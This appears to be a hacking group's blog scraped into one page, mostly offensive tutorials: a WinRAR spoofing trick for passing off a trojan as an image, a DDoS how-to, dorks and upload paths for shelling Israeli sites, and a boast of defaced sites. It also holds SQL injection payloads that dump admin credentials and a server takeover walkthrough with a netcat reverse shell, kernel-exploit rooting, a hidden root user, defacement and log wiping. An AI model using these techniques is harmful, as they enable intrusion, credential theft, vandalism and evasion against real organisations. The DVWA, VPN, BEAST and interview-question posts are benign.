Winrar File Extension Spoofing 0day

In March 2014, winrar file extension spoofing 0day was used wildly to hack many windows users.
In this tutorial, i will explain this vulnerability with some POC images and video created by my friend Gujjar-Haxor (Pak Cyber Pirates).

Vulnerability Description:

The file names showed in WinRAR when opening a ZIP file come from the central directory, but the file names used to extract and open contents come from the Local File Header. This inconsistency allows to spoof file names when opening ZIP files with WinRAR, which can be abused to execute arbitrary code. 

NOTE:

This tutorial is found working under windows 7 environment. For some reasons , it didn't work for my friends using windows 8. So, try it on win 7 if it doesn't work for you on win 8. Thanks.

POC:

1- Get a portable executable file. In this tutorial, i am using havij software which is an sql injection tool but you can use some trojan or RAT to infect the victim.




2- Right click on this exe file and click on "Add to archive". Choose ZIP archive format to compress this file into a ZIP archive.




3- Run Hex Editor , Hex workshop or any hex editor and open this compressed ZIP archive in it. Go to the end of hex editor and find havij.exe and rename its extension to jpg like this havij.jpg.







4- Now open this zip archive. You will see havij.jpg icon in the archive. When you will double click it, it will run that havij.exe file. 

(This is just a demonstration, you can use your own metasploit payload, trojan or RATs instead of this havij.exe file)

Read more ...

Easiest Method To Ddos on any site

  Distributed denial of service(ddos)-

 Distributed denial of service attacks on root nameservers are Internet events in which distributed denial-of-service attacks target one or more of the thirteen Domain Name System root nameserver clusters. The root nameservers are critical infrastructure components of the Internet, mapping domain names to Internet Protocol (IP) addresses and other resource record (RR) data.

#More on DDos 

    STEPS OF DDos-

 #1- Download files from here-

http://leetkhan.ga/ddos.zip(password-ultimatehackers)

#2 - Unpack all files in a directory

#3- Choose a target 

#4a- For example i had choosen a site nemed http://site.com(for testing)

#4b- Open cmd(commant prompt)

#4c- write ping site.com

#4d- Note down ip address of the site

#5- Open the directory in which u unpacked zip archive mentioned above

#6a- Install freeportscanner.exe. When installation complete open it and wirte ip address we note previously like image shown

 #6b- Hit enter and after somtime you will see the open port in that site

 

####Hint- You can skip scanning step (5 to 6a) and choose 80/tcp on any site because it must be open and normally http request rely on port 80/tcp

#7- Open Rdos.exe 

 

 #7b- Hit enter and see magic

#####comment below if u face any problem######

Read more ...

#opSaveGaza / #opIsrael -- Ultimate Hackers

You Can Burn Our Mosques, Our Homes , 

* Our Schools And Whatever You Want  

 But !

* Our Sprit Will Never Die!  

* We Will Never Go Down! * Stop Killing Innocents

#opSaveGaza / #opIsrael

 

[Some Israel websites hacked]

http://bodyguard.co.il/save_gaza.html
http://text2join.co.il/save_gaza.html
http://derech-eretz.co.il/save_gaza.html
http://warranty.roltime.co.il/save_gaza.html
http://frogs.co.il/save_gaza.html
http://psychoblog.co.il/save_gaza.html
http://www.3access.com/index.html

[Gov + UseFul Sites Down]

 

http://gov.il

http://mossad.gov.il

http://health.gov.il

http://bankmassad.co.il

http://act.co.il

http://president.gov.il

http://kranoth.org.il

http://mfa.gov.il 

http://investinisrael.gov.il

http://agri.gov.il

http://wiezmann.ac.il

and many more!

./Ultimate hackers

Greetz to : 1337kh4n , 4n0nkh4n ,r007 ,d4rk1337 ,Cyb3rd0n ,baby<3 And all other Ultimate Hackers Members!

#-Proof

 

 

Read more ...

Testing Your Sql injection Skills (Create Your Own Penetration Testing Lab)

Hello Guys

Its me 4n0nkh4n

This Tutorial is about testing your knowledge about sql injection.

If you dont know about sql injection . 

Read these topics first :   1. Step by step Sql Injection

                                          2. String Based Sql Injection

 

So Come to the topic now :p

 if you have knowledge of sql injection n you wanna test it

or you wanna practice sql injection attack 

 

                  *Just go Here

 n there is many levels to solve :)

if you did it 

Then here is one more thing to do.

 

Create Your Own Penetration Testing Lab with DVWA :-

 

What is DVWA ?

Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn vulnerable. Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, help web developers better understand the processes of securing web applications and aid teachers/students to teach/learn web application security in a class room environment.

Download DVWA Now

Download XAMPP Now

You need a XMAPP Software for this lab to run a DVWA on local server.

after downloading , install XAMPP as administrator. So now start the  Apache , MySql and Filezilla services. Sometimes if any other application is using the ports , it will give you error. like my case 443 port number is used by Vmware workstation. so just disable this services with task manager.

Now extract the DVWA file that you downloaded from the above mentioned link. and paste in the C:\xampp\htdocs folder.

now navigate to https://127.0.0.1/dvwa and click on the Setup option to start the setup.

after setup enter the credentials username = admin and password = password to login.

now click on the Setup option and click on the Create Database option to create your database.

now your penetration lab ready for your security application testing .

Enjoy your Penetration Testing Lab with DVWA.

Hope you like my post.Create Your Own Penetration Testing Lab with DVWA. Dont be Selfish Please Share it with others. :p

#4n0nkh4n

./Ultimate_hackers

 

 

 

 

Read more ...

Israel Private 0Day Shell Upload Exploits ASP|PHP

Hey Guyz ..Today I found some FRESH Private Israel 0Day Exploits . So i thought of sharing with you all....So lets Start....

1). First 0Day Shell Upload ASP | PHP

# Google Dork -|-

'prod1.aspx?pid=' site:il or You can also create your own Dork

# Exploit Upload 1 -|-
/admin/adminbanners.aspx

# Exploit Upload 2 -|- 
/admin/AdminPics.aspx

When you upload your asp or php shell just Check Code Source of the page you will see your url

2). Second 0day Upload

# Dork -|- 
inurl:/index.php?categoryID= site:il
inurl:/index.php?ukey=auth
inurl:/index.php?ukey=feedback
inurl:/index.php?ukey=pricelist
inurl:/index.php?ukey=auxpage_faq
inurl:/shop/index.php?categoryID=
inurl:ukey=product&productID=

# Exploit -|-
/published/common/html/xinha/plugins/ImageManager/manager.php

‪#‎Exploit‬ -|-
/published/common/html/xinha/plugins/ExtendedFileManager/manager.php

3). Third 0day Upload Blind Sql Injection

 This just Targets with havij or manually and admin page of the script is www.target.co.il/QAdmin

# Dork -|- 

intext:cybercity site:il
inurl:index.php?id= <-- Page 4
intext:medicine site:il
inurl:index.php?id= <-- page 2

Read more ...

String Based SQL injection

What is String Based SQL injection and how to notice them?
To make this simple to understand, String Based SQL injection happens when the site is vulnerable to SQL injection but doesn't show us the results needed to be displayed after executing our SQLi query.
Common known issues that proves the site being vulnerable to String Based are:

Code:

"order by" doesn't work, example: order by 100--
"group by" doesn't work
"having 1=2" doesn't work
queries related to SQL injection doesn't work (will show a normal page even though site is vuln to SQLi)

---

---

---

Solution to this issue in order to hack a site with String Based SQL injection
The answer to this problem is by using the following format while trying to hack a site with SQLi

Code:

http://site.com/index.php?id=10' order by 1000--+

That will show us the error, hence displaying the results according to our query.
The point here is that we used the quote ' and the + sign in our query

Code:

id=X' order by--+

Alright that you've got the point lets try String Based on some of the other types of SQL injection shall we

---

---

String-Union Based SQL injection
1. Obtaining the number of columns (in this example, we'll use 10 columns)

Code:

http://www.site.com/index.php?id=234' order by 11--+

Results show error, so we'll assume as 10 columns, since it'll be an example for our process

2. Obtaining the Databases

Code:

http://www.site.com/index.php?id=-234' UNION SELECT 1,2,3,4,5,group_concat(schema_name,0x0a),7,8,9,10 from information_schema.schemata--+

Results will display the databases on their website
Note: If you don't know anything about UNION Based SQL injection, I suggest you read one of my tutorials to progress further in this step

3.Obtaining the Tables from the current Database

Code:

http://www.site.com/index.php?id=-234' UNION SELECT 1,2,3,4,5,group_concat(table_schema,0x0a),7,8,9,10 from information_schema.tables where table_schema=database()--+

Results will display the current table names
For this example, we'll be using the table name: "admin"

4.Obtaining Column names from a specific table (which in this example is "admin")

Code:

http://www.site.com/index.php?id=-234' UNION SELECT 1,2,3,4,5,group_concat(column_name,0x0a),7,8,9,10 from information_schema.columns where table_name=0x61646d696e--+

Results will display the column names from the current table
To convert plain text to hex, use: http://www.swingnote.com/tools/texttohex.php

For this example, we'll use "username" and "password" as our column names

5.Obtaining Data from Column names

Code:

http://www.site.com/index.php?id=-234' UNION SELECT 1,2,3,4,5,group_concat(username,0x3a,password,0x0a),7,8,9,10 from admin--+

Results will display the data given by the columns you have chosen

This can be also done with Error Based SQL injection, Blind Based and other types of SQL injection

Read more ...

Top 10 Free Vpn Services!!!

Top 10 Free VPN Servies
First of all, lets talk about what a VPN is.
VPN simply means “Virtual Private Network”. Basically it’s a private network which lets users to connect to other users or remote sites using a public network usually internet. It uses “virtual” connections routed through the Internet from the company’s private network to the remote site or employee instead of physical connections. In short , it is private network constructed within a public network infrastructure, such as the global Internet.
Why You Need VPN

To protect privacy, either on a LAN or a public hotspot.
Anonymous Internet Surfing Full anonymity by hiding your real IP address.
Bypass geographical blocks from certain websites Unlike a proxy, you get secured connection for all programs you are using Quality Network ensures your VPN service will be fast wherever you are in the world Protection against your ISP Bypass ISP Blocking for VOIP Applications like Skype.

Top 10 Free VPN Servies
1. UltraVPN
(https://www.ultravpn.fr/) It is a free VPN client/ server SSL VPN solution based on OpenVPN. It encrypts and anonymizes your network connection making your connection safe and secure. You need to download and install the client and create a (username, password) to use this service.
2. Logmein Hamachi
( https://secure.logmein.com/products/hamachi2/download.aspx )
It’s a great free VPN service from the well known guys who are behind the Logmein Service of remote apps management. It’s free for non-commercial and personal use. Features : No hardware required – A quick, simple and easy-to-use VPN that just works Secure communications – Encrypted tunneling across public and private networks Flexible networking – Combines the ease of an SSL VPN with the connectivity of an IP-sec VPN Web-based management – Deploy to anyone, manage from anywhere, access anytime Free for non-commercial usage – Absolutely free for non- commercial use.
3. Packetix
(http://www.packetix.net/en/)
Its a japanese free VPN solution with technology developed by SoftEther Corporation.You can use PacketiX.NET online test service for free.Here’s what you can do with this service. You can create your private Virtual VPN Hub. You can configure and use the hub for free.You can use all functions the PacketiX VPN software has to offer, such as creating a remote connection to your home network or uniting local networks at different sites. With our system, you won’t need to set up a VPN server with a global IP address yourself. The VPN server administration is done over an easy web interface.
4. Open VPN
( http://openvpn.net/index.php/opensource/downloads.html )
Open VPN drives UltraVPN, OpenVPN is a SSL/TLS based VPN, it provides high security and privacy. The biggest difference between PPTP VPN and OpenVPN is you need install OpenVPN client software to use OpenVPN service, and OpenVPN DO NOT work on mobile devices such as Iphone, Ipad Windows Mobile and Android. But OpenVPN works on Windows, Mac and Linux.
5. Your Freedom
( http://www.your-freedom.net/index.php?id=downloads )
This one is basically not a VPN service but its performs almost the same function with great ease, hence i included this in this list. It provides both a free and paid service. Free service limits to six hours of usage per day (up to 18 hours per week). You need to install a client on your system and a user name & password to use this.
6. Macro VPN
(http://www.macrovpn.com/)
Just like other services MacroVPN offer free VPN service for the user’s, it provides 128bit PPTP encrypted VPN Connection Service, protection on wifi hotspot. Normally assigned US based IP’s.
7. Hotspot Shield
( http://hotspotshield.com/?lg=en)
Hotspot Shield is a free VPN service which protects your entire web surfing session; securing your connection at both your home Internet network & Public Internet networks (both wired and wireless) . Hotspot Shield protects your identity by ensuring that all web transactions (shopping, filling out forms, downloads) are secured through HTTPS.Here also, you need to download and install a client to use it on your computer.
8. Its Hidden
(http://itshidden.com/)
Itshidden is part of Port 80 Limited(Seychelles) company providing both free VPN and paid services of VPN It creates a secure connection encrypting all the data protecting your privacy and securing you. You dont need to install any software. ItsHidden.com works on all Platforms including Windows, Mac, Linux, IPhone etc
9. CyberGhost
(http://cyberghostvpn.com/)
This a free VPN service from Germany which helps you route you through a German IP. The free service is limited to 10GB traffic every month, which is more than enough for surfing on websites, chatting and email.
10. Gpass
( http://gpass1.com/gpass/)
This is another free VPN service product of the World’s Gate, Inc which offers Internet solutions for information freedom in China and other regions. You need to install a software client to use this.

Read more ...

Your iPhone can be hacked because of iOS vulnerability

Recently Apple Inc released software patches and update for the current versions of iOS for iPhone 4 and newer versions, iPad 2 and later, and the fifth generation iPod touch. A major flaw in Apple devices could allow hackers to intercept email and other communications that are meant to be encrypted, the company says.

"Without the fix, a hacker could impersonate a protected site and sit in the middle as email or financial data goes between the user and the real site" Matthew Green said.

"Apple pushed a rather spooky security update for iOS that suggested that something was horribly wrong with SSL/TLS in iOS but gave no details."  Adam Langley, Google engineer said.

After analyzing the patch, several security researchers said the same flaw existed in current versions of Mac OSX, running Apple laptop and desktop computers. There is no patch released for Mac OSX still now.

'We are aware of this issue and already have a software fix that will be released very soon.'  Trudy Muller, Apple spokesman said.

The issue is a "fundamental bug in Apple's SSL implementation," said Dmitri Alperovich, chief technology officer at security firm CrowdStrike Inc. Adam Langley, a senior engineer at Google, agreed with CrowdStrike that OS X was at risk.

Apple did not reply to requests for comment. The flaw appears to be in the way that well-understood protocols were implemented, an embarrassing lapse for a company of Apple's stature and technical prowess. 

(With inputs from Reuters)

Read more ...

Secure Your PC by using Image as Login Password

In this post i am sharing a new way you can set password for your laptop or PC if you are using Windows 8. You can secure your Computer Easily by using Image as password for your Login. Yes, It is possible now,
In windows 8 you can Use image as your password. Using Text password is old and Boring way, Why not try something different. Their are many benefits of using Image as wallpaper, most important is that it is more secure than any text password. Read The full Post, I have mentioned Each step that you can follow to change or Use Any picture as Password. Using Image Gesture is very easy to use in windows 8

Steps To Create a Picture Password for Windows 8 :

Step 1: First Step is to creating a text password. Press Win key + I , Then click on Change PC settings. Than you will see an option of Create password below Sign-in Options. Just click on create password and Type any safe password for you.

Step 2: Now a new option for Create a picture password will be visible to you. Like in Below given Screenshot. Just Tap on it and choose a New Picture you want to set as password

 Step 3: Now the Third Step is very important. You have to Make 3 Gestures on the picture you choose as password for your PC. Making Gesture is very Easy, but you have to keep that gesture in your mind as that gesture will allow you to login in your PC after setting picture as password. You can make a line, circle or box or anything. But Make it easy to remeber. You can check below screenshot. This arrow is my first gesture.

Also Check :   Setting Up Port Forwarding In Router :D

Step 4: Now Click on next and Make another gesture. You have to make 3 gesture.  After Making Click Save.

Its done, Now you had set an picture as password for your window 8. If you like this article, comment below and Support me to bring such more interesting Article for you.

Below given screenshot is the 3 gestures i have used for my password. You can also create any gesture like me.

               

Read more ...

How to Hack a Server

Tutorial on Web Hacking by 4n0nkh4n

Web-Hacking is my favorite topic that I could easily discuss for hours.

When I had the idea to expand our Blog’s topics (not only Apple, iPhone, iPad, little tips on Mac and Windows etc….) and add more hacking information, tutorials etc….
So, today I decided to make a good start by creating this post-tutorial: How to Hack a Server
Everything you need to know….

Tools you need:

- Backtrack (Backtrack Website)
- Firefox (get it from here….) – Included in Backtrack and Ubuntu
- Netcat (Included in Backtrack)   — If you are on other linux enviroments get it from here….
- iCon2PHP (Get it from here….)
- A good shell (iCon2PHP Archive includes three great shells)
- A good VPN or Tor (More explanation below…..)
- Acunentix Web Vulnerability Scanner (google it or contact us)

About the Tools:

Backtrack
– Backtrack is a Linux distribution based on Ubuntu. It includes everything you need to become a good hacker. Apart from this, hacking behind a Linux system is better than a Windows one since most Websites are on Linux Servers.
(Just a little tip: To wirelessly connect to a network use the Wicd Network Manager, located under the Applications->Internet)
Firefox
– Firefox is the best browser for hacking. You can easily configure a proxy and you can download millions of add-ons among which you can find some for Hacking.
Netcat
– Netcat is a powerful networking tool. You will need this to root the server….
iCon2PHP & Good Shells
– iCon2PHP is a tool I created and you will use it if you upload the image to an Image Uploader at a Forum or Image Hosting Service. iCon2PHP Archive contains some of the top shells available.
Good VPN or TOR (Proxies are good too…)
– While hacking you need to be anonymous so as not to find you (even if you forget to delete the logs….). A VPN stands for Virtual Private Network and what it does is: hiding your IP, encrypting the data you send and receive to and from the Internet. A good VPN solution for Windows Maschines is ProXPN. However, with VPN connections (especially when you are under a free VPN connection) your connection speen is really slow. So, I wouldn’t recommend VPN except if you pay and get a paid account.
What I would recommend is Tor. Tor can be used from its bundle: Vidalia, which is a great tool for Windows, Mac and Linux that uses Proxies all over its network around the world so as to keep you anonymous and changing these Proxies every 5-10 minutes. I believe it is among the best solutions to keep you anonymous if you don’t want to pay for a Paid VPN account
Apart from Tor, simple Proxies are good but I wouldn’t recommend them as much as I would for Tor.
                — If I listed the above options according to their reliability :                                 
1. Paid VPN Account at ProXPN
2. Tor
3. Free VPN Account at ProXPN
4. Proxy Connection
Acunetix Web Vulnerability Scanner
– Acunetix is (maybe the best) Vulnerability Scanner. It scans for open ports, vulnerabilities, directory listing. During the scan it lists the vulnerabilities and says how a hacker can exploit it and how to patch it. It also shows if it is a small or big vulnerability.
The Consultant Edition (For unlimited websites) costs about 3000-7000$.

____________________________________________________________

Starting the Main Tutorial:

So, here is the route we will follow:
Find a Vulnerable Website –> Upload a c100 Shell (Hidden in an Image with iCon2PHP) –> Rooting the Server –> Defacing the Website –> Covering your Tracks

- – -  Before we begin  – - -

-Boot to Backtrack
-Connect to your VPN or to Tor.
-Open Firefox.

1. Finding a Vulnerable Website and Information about it:

Crack Acunetix . Open and scan the  website (use the standard profile – don’t modify anything except if you know what you are doing). For this tutorial our website will be: http://www.site.com (not very innovative, I know….)
Let’s say we find a vulnerability where we can upload a remote file (our shell) and have access to the website’s files.

The Warning should be something like this. It can mention other information or be a completely other warning (like for SQL Injection – I will post a Tutorial on this also…), too! (Depends on the Vulnerability) What we need at this tutorial is that we can exploit the ‘File Inclusion Attack’ and Have access to the Website’s Files. (This is not the warning we need for this tutorial, but it is related to what we do too.)

OK. Now, we have the site and the path that the vulnerability is. In our example let’s say it is here:
http://www.site.com/blog/wp-content/themes/theme_name/thumb.php
The above vulnerability affects WordPress blogs that have installed certain plugins or themes and haven’t updated to the latest version of TimThumb, which is a image-editing service on websites.
OK. Acunetix should also mention the OS of the Server. Assuming that ours is a Unix/Linux system (so as to show you how to root it).
For now, we don’t need anything more from Acunetix.

2. Uploading the shell:

Till now, we know:

-The website’s blog has a huge vulnerability at TimThumb.
-It is hosted on a Unix System.
Next, because of the fact that the Vulnerability is located at an outdated TimThumb version, and timthumb is a service to edit images, we need to upload the shell instead of the image.
Thus, download any image (I would recommend a small one) from Google Images. We don’t care what it shows.

Generate Output with iCon2PHP

Copy your Image and your Shell to the Folder that iCon2PHP is located.
Run the Program and follow the in-program instructions to build the ‘finalImage.php’.
To avoid any errors while uploading rename the ‘finalImage.php’ to ‘image.php;.png’ (instead of png, type the image format your image was – jpeg,jpg,gif….) This is the exactly same file but it confuses the uploader and thinks that it actually is an image.

iCon2PHP Terminal Output:
[...]
Enter the Path of your Image:   image.png
Please enter the path to the PHP:   GnYshell.php
Entered!
Valid Files!
[...]
File: ‘finalImage.php’ has been successfully created at the Current Directory…

Upload Output to a Server:

Next, upload your ‘image.php;.png’ at a free server. (000webhost, 0fees etc….)
Go to the vulnerability and type at the URL:
http://www.site.com/blog/wp-content/themes/theme_name/thumb.php?src=http://flickr.com.domain.0fees.net/image.php;.png
It would be better to create a subdomain like “flickr.com” (or other big image-hosting service) because sometimes it doesn’t accept images from other websites.

Website…. Shelled!

OK. Your website is shelled. This means that you should now have your shell uploaded and ready to root the server.
You could easily deface the website now but it would be better if you first rooted the server, so as to cover your tracks quickly.

3. Root the Server:

Now that you have shelled your website we can start the proccess to root the server.

What is rooting when it comes for Server Hacking?
—> Rooting a server is the proccedure when the hacker acquires root priviliges at the whole server. If you don’t understand this yet, I reasure you that by the end of the section “Rooting a server” you will have understood exactly what it is…

Let’s procceed to rooting….
Connect via netcat:
1. Open a port at your router. For this tutorial I will be using 402. (Search Google on how to port forward. It is easier than it seems….)
2. Open Terminal.
3. Type:

netcat

4. Now type:

-l -n -v -p 402

5.It should have an output like this:

listening on [any] 402 port

6. Now, go to the Back-Connection function at the Shell.
7. Complete with the following:

Host:YouIPAddress Port: 402 (or the port you forwarded….)

8. Hit connect and… Voila! Connected to the server!
Downloading and Executing the Kernel exploit:
1. Now, if you type:

whoami

you will see that you are not root yet…
2. To do so we have to download a kernel exploit. The kernel version is mentioned at your shell. Find kernel exploits here….
3. Download it to your HDD and then upload it to the server via the Shell. Unzip first, if zipped….
4. Now do the following exploit preparations:

– The most usual types of exploits:
+++ Perl (.pl extension)
+++ C (.c extension)
(( If the program is in C you have first to compile it by typing: gcc exploit.c -o exploit ))
– Change the permissions of the exploit:
chmod 777 exploit

5. Execute the exploit. Type:

./exploit

6. Root permissions acquired! Type this to ensure:

id

or

whoami

7. Add a new root user:

adduser -u 0 -o -g 0 -G 1,2,3,4,6,10 -M root1
where root1 is your desired username

8. Change the password of the new root user:

passwd root1

SUCCESSFULLY ROOTED!

4. Deface the Website:

What is defacing?
Defacing is the proccedure when the hacker uploads his own inbox webpage to alter the homepage of a site. In this way, he can boost his reputation or parse a message to the people or the company (which owns the website…).

Since you got the website shelled, you just create a nice hacky page in html and upload it via the Shell as inbox.html (Delete or rename the website’s one…)

5. Cover your tracks:

Till now you were under the anonymity of Tor or ProXPN. You were very safe. However, in order to ensure that it will be impossible for the admin to locate you we have to delete logs.
First of all, Unix based-Maschines have some logs that you have better to either edit or delete.
Common Linux log files name and their usage:

/var/log/message: General message and system related stuff
/var/log/auth.log: Authenication logs
/var/log/kern.log: Kernel logs
/var/log/cron.log: Crond logs (cron job)
/var/log/maillog: Mail server logs
/var/log/qmail/ : Qmail log directory (more files inside this directory)
/var/log/httpd/: Apache access and error logs directory
/var/log/lighttpd: Lighttpd access and error logs directory
/var/log/boot.log : System boot log
/var/log/mysqld.log: MySQL database server log file
/var/log/secure: Authentication log
/var/log/utmp or /var/log/wtmp : Login records file
/var/log/yum.log: Yum log files

In short /var/log is the location where you should find all Linux logs file.
To delete all of them by once type:

su root1
rm -rf /var/log
mkdir /var/log

Read more ...

SSL/TLS BEAST

SSL/TLS BEAST
Researchers have discovered a serious vulnerability in TLS v1.0 and SSL v3.0 that allows attackers to silently decrypt data that’s passing between a webserver and an end-user browser. This vulnerability can be exploited using a new cookie-based technique called “BEAST” (“Browser Exploit Against SSL/TLS”) that takes advantage of block-oriented cipher implementation such as AES and TripleDES.

Which file transfer protocols are affected?

Any interactive HTTPS-based web-based transfer application that relies on SSL/TLS will probably be affected.   Web-based “file send” applications will almost certainly be affected.  Web services that use cookies to maintain an authenticated session after sign on will also be affected.
At the moment it appears that only protocols that make use of browser cookies are affected.  That means that the FTPS and AS2 protocols are safe for now, even if they use TLS v1.0 or SSL v3.0.
SFTP and other protocols that use encryption not based on SSL/TLS are of course not affected by BEAST.

Which vendors are affected?

Just about ALL of them.  Any on-premise product or cloud-based product that:

• allows end users to upload, download or send files through a web browser
• AND uses an SSL/TLS-secured channel (i.e., uses HTTPS)
• AND uses cookies (even memory-only cookies) to maintain user sessions after the initial sign on

 Recommendation

• CHOICE #1:
  • DISABLE TLS v1.0 support on your file transfer web interfaces
  • DISABLE SSL v.3.0 support
    • (as per this article, SSL v3.0 is also affected)
  • ENABLE TLS v.1.1 and TLS v.1.2 support
• CHOICE #2:
  • DISABLE AES and TripleDES encryption support on your file transfer web interfaces
    • (as per this article, both AES and TripleDES are affected)
  • ENABLE RC4 encryption support
• IN ALL CASES:
  • Keep SSL v.2.0 disabled
    • (you should have already done this years ago)
  • If you are using a managed file transfer gateway or proxy to terminate SSL/TLS sessions, remember to check those configurations too

If you apply our “CHOICE #1″ recommended configuration you will likely encounter some compatibility problems with end users whose web browsers do not support TLS v1.1 or v1.2.  To get around this issue you will need to have your users upgrade their browsers to editions that support TLS v1.1 (see partial list below) or have your end users use a different web browser.  (The latest version of Opera and IE both support TLS v1.1.)
If you apply our “CHOICE #2″ recommended configuration you will not be able to use your FIPS-valided AES or TripleDES algorithms on your SSL/TLS connections.  Rc4 is an older, secure but not FIPS-validated algorithm that is often used by browsers and servers by default.  (R6, R4′s successor, was a runner-up to become the new AES algorithm during the open competition about a decade ago.)  
BEAST requires about two seconds to decrypt each byte of an encrypted cookie. That means authentication cookies of 1,000 to 2,000 characters long will still take a minimum of a half hour for their PayPal attack to work. Nonetheless, the technique poses a threat to millions of websites that use earlier versions of TLS, particularly in light of (the researchers’) claim that this time can be drastically shortened.
The decryption process is fast enough that it’s likely imperceptible users, and the researchers said that in a targeted attack, they likely could steal the cookie from a specific site within five minutes of loading the tool. Rizzo and Duong said that their attack exploits a vulnerability in the TLS 1.0 protocol that has been known for quite some time, but was thought to be unexploitable.”

What web browsers have been patched against this?

Opera is now patched!  (article)  It also supports TLS v1.1 – another fine choice!
IE is now patched! (article)

• Google Chrome will soon have a BEAST patch ready (article)
• Firefox has NOT yet promised a BEAST patch (article)CANNOT FIND any information about Safari/Webkit recognizing BEAST (please send me links!)
  • However, Oracle provided a Java plug-in patch for Firefox to make the most common exploit harder (article)
• 
  

A relatively fresh list of browsers that support more recent versions of TLS v1.1 is maintained here:
http://en.wikipedia.org/wiki/Transport_Layer_Security#Browser_implementations
Currently only Opera (version 10 or higher) and IE (version 8 or higher on Windows 2008 R2 or Windows 7) are listed with TLS v1.1 support.  Firefox does not currently support TLS v1.1, nor does Chrome or Safari.   However pressure to add TLS v1.1 support to those browsers has increased substantially since BEAST was announced.

What are some of the servers that support TLS v.1.1?

Microsoft IIS 7 (on Windows 2008 R2) supports TLS v.1.1 but it must be specially enabled.  (This affects web transfer applications that rely on IIS such as Ipswitch’s WS_FTP Server Web Transfer Module, WS_FTP Server Ad Hoc Module and MOVEit DMZ.)
Many other file transfer vendors ship their own web servers with their products – check with your vendor for specific guidance.

this post is taken from http://www.filetransferconsulting.com

Read more ...

infosec interview questions

1) What do you see as the most critical and current threats effecting Internet accessible websites?
2) What online resources do you use to keep abreast of web security issues?
3) Give an example of recent security vulnerability or threat?
4) Difference between a threat, vulnerability and risk?
5) What do you see as challenges to successfully deploying/monitoring web intrusion detection?
6) Definition of XSS and its impact on servers and clients?
7) What are the important steps you would recommend to secure a new web application and web server?
8) What is DOM based XSS?
9) What is Blind SQL injection?
10) Where do you get security news from?
11) If you had to both encrypt and compress data during transmission, which would you do first, and why?
12) Difference between HTTP and HTML?
13) Difference between stored and reflected XSS?
14) Common defenses against XSS?
15) Difference between Stateful and Stateless firewall?
16) What kind of network do you have at home?
17) What port does ping work?
18) Explain CSRF?
19) How to defend against CSRF?
20) Difference between XSS and CSRF?
21) As a corporate Information Security professional, what’s more important to focus on: threats or vulnerabilities?
22) What are Linux’s strengths and weaknesses vs. Windows?
23) What’s the difference between Diffie-Hellman and RSA?
24) What kind of attack is a standard Diffie-Hellman exchange vulnerable to? 
25) What’s the goal of information security within an organization?
26) Are open-source projects more or less secure than proprietary ones?
27) What’s the difference between encoding, encryption, and hashing?
28) What is salting?
29) Who do you look up to within the field of Information Security? Why?
30) What is NMAP? Show some nmap commands.(avoid firewall/ids, noping etc.,)
31) What is Key Escrow?
32) What is nonce?
33) What does RSA stand for?
34) What is DES?
35) What is triple DES?
36) What is the difference between Symmetric and Asymmetric?
37) How does HTTP handle state?
38)  In public-key cryptography you have a public and a private key, and you often perform both encryption and signing functions. Which key is used for which?
39) How exactly does traceroute/tracert work at the protocol level?
40) What is a Buffer Overflow?
41) What is a NOP Sled?
42) Design a secure network
43) How do you securely link two offices together?
44) What is the security threat level today at the Internet Storm Center (ISC)?
45) What is SSL?
46) How do you create SSL certificates, generically speaking?
47) What is DNS Hijacking?
48) What is the latest security breach you’re aware of?
49) Have you hacked any system?
50) Can a Virtual Operating System be compromised?
51) What is UPX?
52) What is meterpreter?
53) What is LDAP?
54) Why is LDAP called Light weight?
55) What are the standard port numbers for SMTP, POP3, IMAP4, RPC, LDAP and Global Catalog?
56) What are rainbow tables?
57) What is dsniff?
58) Other than Wireshark, what sniffers have you used?
59) What was the last course you attend? Where? When? Why?
60) What was the last technical book you read?
61) Describe the last security implementation you were involved with.
62) What is a honeypot?
63) Are there limitations of Intrusion Detection Signatures?
64) Describe TCP 3-way Handshake?
65) Difference between pen testing and vulnerability assessment?
66) Difference between vulnerability and mitigation?
67) Give me an example of a vulnerability at each layer of the OSI reference model.
68) Give me a type of mitigation for each of the vulnerabilities you have just provided.
69) OSI(Open System Interconnection) model
70) What is MITM?
71) What is a Syn Flood attack, and how to prevent it?
72) What’s the difference between a router, a bridge, a hub and a switch?
73) Your network has been infected by malware. Please walk me through the process of cleaning up the environment.
74) What’s the difference between a Proxy and a Firewall?
75) Why should I use server certificates on my e-commerce website?

76) What’s port scanning and how does it work?
77) Process of pen testing a system
78) What is NAT and how does it work?
79) What is false positive and false negative?
80) Please detail 802.1x security vs. 802.11 security
81) How would you harden a Windows Server? What about a Linux Server?
82) What are the latest threats you foresee for the near future?
83) What is ISO 27001 and why should a company adopt it?
84) What is the Microsoft Baseline Security Analyzer?
85) Define Security 
86) MAC OS vs. WINDOWS
87) Ping uses TCP or UDP?
88) Explain Authentication and authorization?
89) What is a Brute force attack?
 90) What is meant by client-side scripting?
 91) What is a cookie?
 92) Explain DOS, DDOS
 93) What is directory traversal attack?
 94) What is meant by reconnaissance?
 95) What is forced browsing?
 96) What is meant by session ID?
 97) Define Web application?
 98) What is meant by WAF?
 99) Explain different types of hackers?
100) what are the different types of penetration testing?
101) Explain CIA triad
102) what are Google hacks/dorks?
103) List out OWASP top 10
104) Define Hacking? What is ethical hacking?
105) what are the various penetration testing methodologies?
106) what is social engineering?
107) In the context of Metasploit, explain what is meant by exploit, payload, auxiliary, encoders, NOP, post
108) what are root kits?
109) Explain Steganography
110) Difference between autopwn and armitage
111) what is meant by backdooring?
112) what is INCIDENT RESPONSE?
113) what is chain of custody?
114) what are the different port’s used commonly and list out their port no’s?
115) what is imaging?
116) what is padding?
117) what is pivoting?
118) what is SSH, FTP, TSL?
119) what is HTTP response splitting?
120) what is RFI, LFI?
121) what do you know about encryption?
122) Can CSRF be done for POST and GET methods?
123) what is the encryption of ssl certificate in a website?
124) Difference between public and private key?
125) what is chain of custody?
126) what is meant by incident response?
127) what is hacktivism?
128) what is a firewall? types of firewall?
129) what is ssl, how do you create ssl certificates?
130) what is a spoofed packet
131) what is IDS or IDP? Give example?
132) what would you do if your system is compromised?
133) what is web-caching?
134) what is use of proxy servers?
135) what would you do if your network device is compromised?
136) what is GPG/PGP?
137) what is log host?
138) how do you manage a firewall?
139) if you were not using Apache as the reverse proxy, what Microsoft application/tool could you use to mitigate this attack?
140) Why we use firewall for security when we have facilities like access-list on routers ?
141) what is the difference between an SSL connection and an SSL session?
142) List and briefly define four techniques used to avoid guessable passwords.
143) what is a salt in the context of UNIX password management?
144) what is the difference between rule-based anomaly detection and rule-based penetration identification?
